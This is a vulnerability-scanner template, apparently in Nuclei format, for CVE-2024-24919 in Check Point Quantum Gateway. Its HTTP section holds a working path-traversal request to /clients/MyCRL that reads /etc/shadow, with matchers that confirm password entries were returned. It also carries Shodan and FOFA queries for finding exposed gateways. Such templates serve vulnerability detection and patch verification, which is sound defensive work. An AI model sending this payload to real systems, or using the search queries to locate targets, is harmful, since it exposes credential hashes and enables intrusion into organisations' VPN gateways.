45 lines
1.4 KiB
YAML
45 lines
1.4 KiB
YAML
id: CVE-2024-24919
|
|
|
|
info:
|
|
name: Check Point Quantum Gateway - Information Disclosure
|
|
author: johnk3r
|
|
severity: high
|
|
description: |
|
|
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
|
|
reference:
|
|
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
|
|
- https://support.checkpoint.com/results/sk/sk182337
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: checkpoint
|
|
product: quantum_security_gateway
|
|
shodan-query:
|
|
- html:"Check Point SSL Network"
|
|
- http.html:"check point ssl network"
|
|
fofa-query: body="check point ssl network"
|
|
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
|
|
tags: cve,cve2024,checkpoint,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /clients/MyCRL HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip
|
|
|
|
aCSHELL/../../../../../../../etc/shadow
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*"
|
|
- "nobody:.*"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 |